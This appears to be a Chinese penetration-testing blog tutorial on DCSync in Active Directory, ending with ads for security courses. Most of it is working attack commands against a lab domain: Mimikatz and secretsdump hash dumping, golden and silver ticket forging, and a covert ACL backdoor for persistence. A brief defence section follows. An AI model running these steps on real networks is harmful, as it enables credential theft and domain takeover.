内网渗透攻击技术的利用

DCSync 是什么

在域环境中，不同域控制器（DC）之间，每 15 分钟都会有一次域数据的同步。当一个域控制器（DC 1）想从其他域控制器（DC 2）获取数据时，DC 1 会向 DC 2 发起一个 GetNCChanges 请求，该请求的数据包括需要同步的数据。如果需要同步的数据比较多，则会重复上述过程。DCSync 就是利用的这个原理，通过 Directory Replication Service（DRS） 服务的 GetNCChanges 接口向域控发起数据同步请求。

DCSync 是域渗透中经常会用到的技术，其被整合在了 Mimikatz 中。在 DCSync 功能出现之前，要想获得域用户的哈希，需要登录域控制器，在域控制器上执行代码才能获得域用户的哈希。

2015 年 8 月，Benjamin Delpy（神器 Mimikatz 的作者）和 Vincent Le Toux 发布了新版本的 Mimikatz，新增加了 DCSync 功能。该功能可以模仿一个域控制器，从真实的域控制器中请求数据，例如用户的哈希。该功能最大的特点就是不用登陆域控制器，即可远程通过域数据同步复制的方式获得域控制器上的的数据。

注意：DCSync 攻击的对象如果是只读域控制器 (RODC)，则会失效，因为 RODC 是不能参与复制同步数据到其他 DC 的。

在默认情况下，只有 Administrators、Domain Controllers 和 Enterprise Domain Admins 组内的用户有权限使用 DCSync，但我们可以对域内普通用户添加 ACL (Access Control List) 实现普通用户也能调用 DCSync 功能。

2021最新整理网络安全\渗透测试/安全学习（全套视频、大厂面经、精品手册、必备工具包）一>点我<一

利用 DCSync 导出域内哈希

当我们获取相应的权限后，可以利用 DCSync 功能导出域内用户的哈希值。其原理就是利用 DRS （Directory Replication Service）协议通过 IDL_DRSGetNCChanges 从域控制器复制用户哈希凭据。获得了域内用户的哈希后可以进一步利用。

通过 Mimikatz

在获取权限的域成员主机上执行如下：

# 导出域内指定用户的信息(包括哈希值)
lsadump::dcsync /domain:whoamianony.org /user:administrator 
lsadump::dcsync /domain:whoamianony.org /user:administrator /csv

# 导出域内所有用户的信息(包括哈希值)
lsadump::dcsync /domain:whoamianony.org /alllsadump::dcsync /domain:whoamianony.org /all /csv 

如上图所示，成功获取 Administrator 用户的 NTLM 哈希。

通过 Secretsdump.py

Secretsdump.py 是 Impacket 框架中的一个脚本，该脚本也可以通过 DCSync 技术导出域控制器上用户的哈希。该工具的原理是首先使用提供的用户登录凭据通过 smbexec 或者 wmiexec 远程连接至域控制器并获得高权限，进而从注册表中导出本地帐户的哈希，同时通过 Dcsync 或从 NTDS.dit 文件中导出所有域用户的哈希。其最大的优点是支持从域外的计算机连接至域控制器。

使用方法如下：

python3 secretsdump.py whoamianony/administrator:Whoami2021@192.168.93.30 -dc-ip 192.168.93.30 -just-dc-user administrator# 获取 administrator 用户的哈希
# python3 secretsdump.py domain/<username for DCSync>:password@<dc-ip> -dc-ip <dc-ip> -just-dc-user <username for DCSync> 

python3 secretsdump.py whoamianony/administrator:Whoami2021@192.168.93.30# 获取所有域用户哈希, 包括机器用户 

通过 PowerShell

该脚本可以通过 Invoke-ReflectivePEinjection 调用 mimikatz.dll 中的 DCSync 功能

在获取权限的域成员主机上执行如下命令即可：

Import-Module .\Invoke-DCSync.ps1
​
# 导出域内所有用户的哈希值
Invoke-DCSync -DumpForest -Users @("administrator") | ft -wrap -autosize
​
# 导出域内指定用户的哈希值
Invoke-DCSync -DumpForest | ft -wrap -autosize 

利用 DCSync 制作黄金票据

在域渗透中，我们可以通过 DCSync 导出域控制器中 krbtgt 账户的哈希，并利用 krbtgt 账户的哈希制作黄金票据。

测试环境如下：

假设攻击者已经拿下了内网主机 Windows 10，下面演示如何在内网中利用 DCSync 制作黄金票据来访问 DC 上的资源。

拿下 Windows 10 主机之后，我们加载 kiwi 模块：

load kiwi

然后通过kiwi_cmd执行 Mimikatz 命令，使用 Mimikatz 的 DCSync 功能导出域控制器中 krbtgt 账户的哈希：

kiwi_cmd "lsadump::dcsync /domain:whoamianony.org /user:krbtgt" 

然后我们便可以通过 krbtgt 账户的哈希生成黄金票据了：

golden_ticket_create -u Administrator -d whoamianony.org -s S-1-5-21-1315137663-3706837544-1429009142 -k 6be58bfcc0a164af2408d1d3bd313c2a -t gold.tck 

执行后生成的票据会咱是存放在你的 Kali 上，然后执行以下命令，清空目标主机上的票据：

kerberos_ticket_purge

最后使用kerberos_ticket_use注入刚才生成的票据即可：

kerberos_ticket_use gold.tck

如上图所示，票据成功注入。此时，攻击者就可以利用 Windows 7 任意访问域控上的资源了：

dir \\DC\c$

有了黄金票据之后的操作就简单了，懂得都懂！

利用 DCSync 进行域内权限维持

我们前面说了，要想利用 DCSync 功能，得要拥有 Administrators、Domain Controllers 或 Enterprise Domain Admins 组内的用户权限。但是我们就不能让普通域用户拥有 DCSync 的操作权限吗？当然可以！

当我们获得了域内管理员权限后，我们可以修改域内普通用户的权限，使其具有 DCSync 操作权限，那么普通域用户也能导出域内用户的信息了，这样可以可以做一个隐蔽的后门进行权限维持。具体做法就是为普通域用户添加三条 ACE 访问控制项：

DS-Replication-Get-Changes（GUID:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2）

DS-Replication-Get-Changes-All（GUID:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2）

DS-Replication-Get-Changes（GUID:89e95b76-444d-4c62-991a-0facbeda640c）

我们可以通过 Empire 框架中的 PowerView.ps1 脚本实现：

Import-Module .\powerview.ps1
​
# 为域用户 whoami 添加以上三条 ACE
Add-DomainObjectAcl -TargetIdentity "DC=whoamianony,DC=org" -PrincipalIdentity whoami -Rights DCSync -Verbose

# 为域用户 whoami 删除以上三条 ACE
Remove-DomainObjectAcl -TargetIdentity "DC=whoamianony,DC=org" -PrincipalIdentity whoami -Rights DCSync -Verbose 

此时域用户 whoami 便具有了 DCSync 权限。之后便可以用这个 whoami 用户的权限进行 DCSync 攻击了。

我们可以利用 whoami 用户的身份，通过 Secretsdump.py 的 DCSync 功能导出 DC 上的用户哈希。

python3 secretsdump.py whoamianony/whoami:Whoami2021@192.168.93.30 -dc-ip 192.168.93.30 -just-dc-user administrator 

还可以先使用runas实现登录 whoami 用户，然后再使用 DCSync。

首先执行以下命令弹出一个 whoami 用户登录权限的 CMD：

runas /noprofile /user:whoamianony\whoami cmd

然后在弹出的 CMD 中执行 Mimikatz 进行 DCSync 即可：

mimikatz.exe privilege::debug "lsadump::dcsync /domain:whoamianony.org /all /csv" exit 

同样，也可以先使用 PowerShell 实现登录 whoami 用户，然后再使用 DCSync。

首先执行以下命令弹出一个 whoami 用户登录权限的 CMD：

$uname="whoamianony\whoami"
$pwd=ConvertTo-SecureString "Whoami2021" -AsPlainText –Force
$cred=New-Object System.Management.Automation.PSCredential($uname,$pwd)
Start-Process -FilePath "cmd.exe" -Credential $cred 

然后再弹出的 CMD 中执行 Mimikatz 进行 DCSync 即可：

mimikatz.exe privilege::debug "lsadump::dcsync /domain:whoamianony.org /all /csv" exit 

查询域内具有 DCSync 权限的用户

我们可以使用 Adfind 来查询域内具有 DCSync 权限的用户：

AdFind.exe -s subtree -b "DC=whoamianony,DC=org" -sdna nTSecurityDescriptor -sddl+++ -sddlfilter ;;;"Replicating Directory Changes";; -recmute
​
AdFind.exe -s subtree -b "DC=whoamianony,DC=org" -sdna nTSecurityDescriptor -sddl+++ -sddlfilter ;;;"DS-Replication-Get-Changes";; -recmute 

使用机器账户（MachineAccount）实现 DCSync

MachineAccount 即机器账号、计算机账号，是每台计算机在安装系统后默认生成的帐户。所有加入域的也主机都会有一个机器用户，用户名为机器名加$，如：WIN7$、WINXP$。

计算机帐户的密码存储在注册表中的位置为：

HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets\$machine.ACC
# 该注册表键路径只能在 SYSTEM 权限下访问 

如果计算机加入域中，会将计算机帐户的密码同步到域控制器并保存在域控制器的 NTDS.dit 活动目录数据库文件中。计算机帐户的密码默认每 30 天自动更新，密码长度为 120 个字符，所以即使我们获得了计算机帐户密码的哈希值，也几乎无法还原出计算机帐户的明文口令。

要使用机器账户实现 DCSync，首先要做的就是获取机器账户身份的权限，然后再利用机器账户的身份进行 DCSync 操作。下面进行具体的演示。

首先获取 MachineAccount 的密码哈希

可以直接在域控上使用 Mimikatz 通过注册表文件导出当前计算机帐户的密码哈希。

privilege::debug
token::elevate
lsadump::secrets 

也可以在域成员主机上利用 DCSync 导出所有计算机帐户的密码哈希。

mimikatz.exe "lsadump::dcsync /domain:whoamianony.org /all /csv" 

python3 secretsdump.py whoamianony/administrator:Whoami2021@192.168.93.30 

然后使用 MachineAccount 进行 DCSync

有了机器账号的密码哈希后，我们需要想办法登录到这个机器账号，由于无法破解哈希，我们可以使用白银票据的方法。

利用方式如下：

mimikatz "kerberos::golden /domain:whoamianony.org /sid:S-1-5-21-1315137663-3706837544-1429009142 /target:DC.whoamianony.org /service:LDAP /rc4:8e89dfbe74fcae2e993ea2aa47b6a9c1 /user:krbtgt /ptt" "lsadump::dcsync /domain:whoamianony.org /all /csv" exit 

也可以通过 secretsdump，使用机器账户的哈希从域外的计算机连接至域控制器导出哈希：

python3 secretsdump.py -hashes :8e89dfbe74fcae2e993ea2aa47b6a9c1 whoamianony/DC$@192.168.93.30 

注意：如果使用域内普通计算机帐户的密码哈希连接对应的计算机，那么会失败。

DCSync 的防御

DCSync 攻击的原理是模拟域控制器与域控制器之间的数据同步复制。最好的防御方法是给控制器设置白名单，将可信任的资产设置在允许同步的白名单内。

除此之外，我们还应尝试枚举 Active Directory 中所有用户的 ACL 查询出所有特权帐户，检测域内被添加 DCSync 权限的用户。Github 上有一个项目 ACLight便提供了这样的功能，只需执行项目中的 Execute-ACLight2.bat，便会生成以下三个文件：

Privileged Accounts - Layers Analysis.txt

Privileged Accounts Permissions - Final Report.csv

Privileged Accounts Permissions - Irregular Accounts.csv

文件中会显示出所有特权帐户。

学习网络安全技术的方法无非三种:

第一种是报网络安全专业，现在叫网络空间安全专业，主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习，多媒体技术，信息检索、舆情分析等。

第二种是自学，就是在网上找资源、找教程，或者是想办法认识一-些大佬，抱紧大腿，不过这种方法很耗时间，而且学习没有规划，可能很长一段时间感觉自己没有进步，容易劝退。

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

第三种就是去找培训。

接下来，我会教你零基础入门快速入门上手网络安全。

网络安全入门到底是先学编程还是先学计算机基础？这是一个争议比较大的问题，有的人会建议先学编程，而有的人会建议先学计算机基础，其实这都是要学的。而且这些对学习网络安全来说非常重要。但是对于完全零基础的人来说又或者急于转行的人来说，学习编程或者计算机基础对他们来说都有一定的难度，并且花费时间太长。

第一阶段：基础准备 4周~6周

这个阶段是所有准备进入安全行业必学的部分，俗话说：基础不劳，地动山摇

第二阶段：web渗透

学习基础 时间：1周 ~ 2周：

① 了解基本概念：（SQL注入、XSS、上传、CSRF、一句话木马、等）为之后的WEB渗透测试打下基础。
② 查看一些论坛的一些Web渗透，学一学案例的思路，每一个站点都不一样，所以思路是主要的。
③ 学会提问的艺术，如果遇到不懂得要善于提问。

配置渗透环境 时间：3周 ~ 4周：

① 了解渗透测试常用的工具，例如（AWVS、SQLMAP、NMAP、BURP、中国菜刀等）。
② 下载这些工具无后门版本并且安装到计算机上。
③ 了解这些工具的使用场景，懂得基本的使用，推荐在Google上查找。

渗透实战操作 时间：约6周：

① 在网上搜索渗透实战案例，深入了解SQL注入、文件上传、解析漏洞等在实战中的使用。
② 自己搭建漏洞环境测试，推荐DWVA，SQLi-labs，Upload-labs，bWAPP。
③ 懂得渗透测试的阶段，每一个阶段需要做那些动作：例如PTES渗透测试执行标准。
④ 深入研究手工SQL注入，寻找绕过waf的方法，制作自己的脚本。
⑤ 研究文件上传的原理，如何进行截断、双重后缀欺骗(IIS、PHP)、解析漏洞利用（IIS、Nignix、Apache）等，参照：上传攻击框架。
⑥ 了解XSS形成原理和种类，在DWVA中进行实践，使用一个含有XSS漏洞的cms，安装安全狗等进行测试。
⑦ 了解一句话木马，并尝试编写过狗一句话。
⑧ 研究在Windows和Linux下的提升权限，Google关键词：提权

以上就是入门阶段

第三阶段：进阶

已经入门并且找到工作之后又该怎么进阶？详情看下图

给新手小白的入门建议：
新手入门学习最好还是从视频入手进行学习，视频的浅显易懂相比起晦涩的文字而言更容易吸收，这里我给大家准备了一套网络安全从入门到精通的视频学习资料包免费领取哦！

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！